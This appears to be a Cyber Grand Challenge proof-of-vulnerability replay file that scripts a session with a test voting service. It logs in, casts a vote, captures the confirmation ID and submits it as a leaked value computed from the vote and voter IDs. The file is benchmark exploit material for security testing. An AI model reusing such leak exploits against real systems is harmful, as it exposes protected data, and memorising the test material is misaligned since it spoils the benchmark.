<?xml version="1.0" standalone="no" ?>
<!DOCTYPE cfepov SYSTEM "/usr/share/cgc-docs/cfe-pov.dtd">
<cfepov>
<cbid>service</cbid>
<replay>
    <negotiate><type2 /></negotiate>

    <read><length>31</length><match><data>17: Create Election\x0a\x0095. Quit\x0a\x00</data></match></read>
    <read><length>19</length><match><data>Choose an option: \x00</data></match></read>
    <write><data>17\x0a</data></write>
    <read><length>31</length><match><data>\x23\x23 Create election manager \x23\x23\x0a\x00</data></match></read>
    <read><length>20</length><match><data>\x09Enter first name: \x00</data></match></read>
    <write><data>cleEJEQtp\x0a</data></write>
    <read><length>19</length><match><data>\x09Enter last name: \x00</data></match></read>
    <write><data>zfggY\x0a</data></write>
    <read><length>20</length><match><data>\x09Your ID number is: </data></match></read>
    <read><length>9</length><match><data>10101010\x0a</data></match></read>
    <read><length>19</length><match><data>\x09Your auth key is: </data></match></read>
    <read><delim>\x0a</delim><assign> <var>authkey</var> <slice begin="0" /> </assign></read>
    <read><length>22</length><match><data>Enter election name: \x00</data></match></read>
    <write><data>TMubHrtguBpkjVQeMiprggYivAxMww\x0a</data></write>
    <read><length>43</length><match><data>Enter number of election winners desired: \x00</data></match></read>
    <write><data>2\x0a</data></write>
    <read><length>45</length><match><data>Enter the max number of candidates allowed: \x00</data></match></read>
    <write><data>20\x0a</data></write>
    <read><length>46</length><match><data>Can voters write\x2din new candidates? \x28Yy\x2fNn\x29: \x00</data></match></read>
    <write><data>Y\x0a</data></write>
    <read><length>19</length><match><data>Election Created.\x0a\x00</data></match></read>
    <read><length>41</length><match><data>14: Login\x0a\x0038. Register Voter\x0a\x0095. Quit\x0a\x00</data></match></read>
    <read><length>19</length><match><data>Choose an option: \x00</data></match></read>
    <write><data>38\x0a</data></write>
    <read><length>20</length><match><data>\x23\x23 Create voter \x23\x23\x0a\x00</data></match></read>
    <read><length>20</length><match><data>\x09Enter first name: \x00</data></match></read>
    <write><data>cSDBflOggWxnppiwybYUko\x0a</data></write>
    <read><length>19</length><match><data>\x09Enter last name: \x00</data></match></read>
    <write><data>CrzIniQZGFpelGadAcqGIsPQgmFbfFscoe\x0a</data></write>
    <read><length>20</length><match><data>\x09Your ID number is: </data></match></read>
    <read><length>9</length><match><data>12341234\x0a</data></match></read>
    <read><length>41</length><match><data>14: Login\x0a\x0038. Register Voter\x0a\x0095. Quit\x0a\x00</data></match></read>
    <read><length>19</length><match><data>Choose an option: \x00</data></match></read>
    <write><data>14\x0a</data></write>
    <read><length>24</length><match><data>\x09Enter your ID number: \x00</data></match></read>
    <write><data>10101010\x0a</data></write>
    <read><length>19</length><match><data>\x09Enter last name: \x00</data></match></read>
    <write><data>zfggY\x0a</data></write>
    <read><length>18</length><match><data>\x09Enter auth key: \x00</data></match></read>
    <write><var>authkey</var></write>
    <read><length>82</length><match><data>15: Main Menu\x0a\x0018. Open Voting\x0a\x0022. Election Status\x0a\x0054. Add Candidate\x0a\x0095. Quit\x0a\x00</data></match></read>
    <read><length>19</length><match><data>Choose an option: \x00</data></match></read>
    <write><data>54\x0a</data></write>
    <read><length>24</length><match><data>\x23\x23 Create candidate \x23\x23\x0a\x00</data></match></read>
    <read><length>20</length><match><data>\x09Enter first name: \x00</data></match></read>
    <write><data>kIwMdUEeAlIeG\x0a</data></write>
    <read><length>19</length><match><data>\x09Enter last name: \x00</data></match></read>
    <write><data>WHQKUNcOtOR\x0a</data></write>
    <read><length>18</length><match><data>Candidate Added.\x0a\x00</data></match></read>
    <read><length>41</length><match><data>14: Login\x0a\x0038. Register Voter\x0a\x0095. Quit\x0a\x00</data></match></read>
    <read><length>19</length><match><data>Choose an option: \x00</data></match></read>
    <write><data>14\x0a</data></write>
    <read><length>24</length><match><data>\x09Enter your ID number: \x00</data></match></read>
    <write><data>10101010\x0a</data></write>
    <read><length>19</length><match><data>\x09Enter last name: \x00</data></match></read>
    <write><data>zfggY\x0a</data></write>
    <read><length>18</length><match><data>\x09Enter auth key: \x00</data></match></read>
    <write><var>authkey</var></write>
    <read><length>82</length><match><data>15: Main Menu\x0a\x0018. Open Voting\x0a\x0022. Election Status\x0a\x0054. Add Candidate\x0a\x0095. Quit\x0a\x00</data></match></read>
    <read><length>19</length><match><data>Choose an option: \x00</data></match></read>
    <write><data>18\x0a</data></write>
    <read><length>14</length><match><data>Voting Open.\x0a\x00</data></match></read>
    <read><length>41</length><match><data>14: Login\x0a\x0038. Register Voter\x0a\x0095. Quit\x0a\x00</data></match></read>
    <read><length>19</length><match><data>Choose an option: \x00</data></match></read>
    <write><data>14\x0a</data></write>
    <read><length>24</length><match><data>\x09Enter your ID number: \x00</data></match></read>
    <write><data>12341234\x0a</data></write>
    <read><length>19</length><match><data>\x09Enter last name: \x00</data></match></read>
    <write><data>CrzIniQZGFpelGadAcqGIsPQgmFbfFscoe\x0a</data></write>
    <read><length>54</length><match><data>15: Main Menu\x0a\x0036. Vote\x0a\x0054. Add Candidate\x0a\x0095. Quit\x0a\x00</data></match></read>
    <read><length>19</length><match><data>Choose an option: \x00</data></match></read>
    <write><data>36\x0a</data></write>
    <read><length>43</length><match><data>Select one candidate from the folloowing:\x0a\x00</data></match></read>
    <read><length>30</length><match><data>\x091: kIwMdUEeAlIeG WHQKUNcOtOR\x0a</data></match></read>
    <read><length>19</length><match><data>Choose an option: \x00</data></match></read>
    <write><data>1\x0a</data></write>
    <read><length>14</length><match><data>Confirmation \x23</data></match></read>

    <!-- Read 10 byte string (vote ID) which we need to get the TYPE2_VALUE -->
    <read><delim>.</delim><assign> <var>voteid12341234</var> <slice begin="0" /> </assign></read>
    <read><length>57</length><match><data> Vote recorded for candidate: kIwMdUEeAlIeG WHQKUNcOtOR.\x0a</data></match></read>
    <read><length>41</length><match><data>14: Login\x0a\x0038. Register Voter\x0a\x0095. Quit\x0a\x00</data></match></read>
    <read><length>19</length><match><data>Choose an option: \x00</data></match></read>
    <write><data>95\x0a</data></write>

    <!-- bogus write, so I can re-mort the code and access the var to extract the TYPE2_VALUE -->
    <write><var>voteid12341234</var></write>
    <!-- Submit (TYPE2_VALUE) <= (vote_id xor voter.id) -->
    <submit><var>voteid12341234</var></submit>

</replay>
</cfepov>
